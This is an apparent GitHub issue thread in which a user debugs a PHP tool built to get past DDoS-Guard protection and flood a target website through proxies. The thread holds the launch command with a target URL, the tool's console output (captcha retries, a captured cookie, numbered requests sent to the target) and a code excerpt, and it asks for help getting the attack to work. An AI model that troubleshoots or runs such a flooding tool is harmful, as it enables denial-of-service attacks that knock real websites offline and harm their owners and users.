### ISSUE TITLE
Attack dont start

### ISSUE THREAD

**Issue by andress134** [somecash/DDoS-Guard-Bypass#1]
@somecash 
php bypass.php https://ddosguard.botflare.xyz 10 3 3 proxies.txt https
just this and stop 

`----------------------------------------------

 ██████╗  █████╗ ██╗   ██╗██████╗  █████╗ ███████╗███████╗
██╔════╝ ██╔══██╗╚██╗ ██╔╝██╔══██╗██╔══██╗██╔════╝██╔════╝
██║  ███╗███████║ ╚████╔╝ ██████╔╝███████║███████╗███████╗
██║   ██║██╔══██║  ╚██╔╝  ██╔═══╝ ██╔══██║╚════██║╚════██║
╚██████╔╝██║  ██║   ██║   ██║     ██║  ██║███████║███████║
 ╚═════╝ ╚═╝  ╚═╝   ╚═╝   ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝

----------------------------------------------
[+] Target: https://ddosguard.botflare.xyz
[+] Timeout: 3
[+] Delay: 3
[+] Proxy Type: HTTPS
[+] Payload: h7BftOfujGloHQV
----------------------------------------------
[+] Proxy: 139.180.189.46:8080
root@offsh:~/DDoS-Guard-Bypass#`

**Comment by somecash** [comment]
Turn off error_reporting(0); and let me know the outcome.

**Comment by andress134** [comment]
> Turn off error_reporting(0); and let me know the outcome.

```
+] Target: https://ddosguard.botflare.xyz
[+] Timeout: 3
[+] Delay: 3
[+] Proxy Type: HTTPS
[+] Payload: zqdklABlejMF65V
----------------------------------------------
[+] Proxy: 173.82.74.62:5836
PHP Warning:  file_get_contents(173.82.74.62:5836.txt): failed to open stream: No such file or directory in /root/DDoS-Guard-Bypass/bypass.php on line 80
PHP Fatal error:  Uncaught Error: Call to undefined function curl_init() in /root/DDoS-Guard-Bypass/bypass.php:85
Stack trace:
#0 {main}
  thrown in /root/DDoS-Guard-Bypass/bypass.php on line 85
root@offsh:~/DDoS-Guard-Bypass#
```

maybe here is the error 

`	echo "[+] Proxy: $proxy\n";
	$cookie_location = "$proxy.txt";
	
	//Checks if attack is on-going
	if (file_get_contents($cookie_location) != null) {
		echo "[+] This proxy is already being used! Use 'rm -rf *.txt' if you feel like this is an error... Ending...\n";
	} else {`

have made some changes, and now is starting but nothing bypass

`oot@offsh:~/DDoS-Guard-Bypass# php bypass.php https://ddosguard.botflare.xyz 100 3 3 proxies.txt https
----------------------------------------------

 ------▒  -----▒ --▒   --▒------▒  -----▒ -------▒-------▒
---====- ---==--▒L--▒ -------==--▒---==--▒---====----====-
--▒  ---▒-------▒ L------ ---------------▒-------▒-------▒
--▒   --▒---==--▒  L----  ---===- ---==--▒L====--▒L====--▒
L----------▒  --▒   --▒   --▒     --▒  --▒-------▒-------▒
 L=====- L=-  L=-   L=-   L=-     L=-  L=-L======-L======-

----------------------------------------------
[+] Target: https://ddosguard.botflare.xyz
[+] Timeout: 3
[+] Delay: 3
[+] Proxy Type: HTTPS
[+] Payload: xpKD3yeFke8sVHb
----------------------------------------------
[+] Proxy: 45.32.124.245:8080
[-] Captcha, retrying with new proxy...
[+] Proxy: 103.83.36.160:5836
[-] Web returned blank, retrying with new proxy...
[+] Proxy: 37.187.3.175:3128
----------------------------------------------
[+] Found cookie: CuFBj3H71rVyACMZwvO6
[+] Sending 100 requests to https://ddosguard.botflare.xyz
----------------------------------------------
[#1] Sent request to https://ddosguard.botflare.xyz
[#2] Sent request to https://ddosguard.botflare.xyz
[#3] Sent request to https://ddosguard.botflare.xyz
[#4] Sent request to https://ddosguard.botflare.xyz
[#5] Sent request to https://ddosguard.botflare.xyz
[#6] Sent request to https://ddosguard.botflare.xyz
[#7] Sent request to https://ddosguard.botflare.xyz`

but requests are not sending, bypass don't work, something wrong
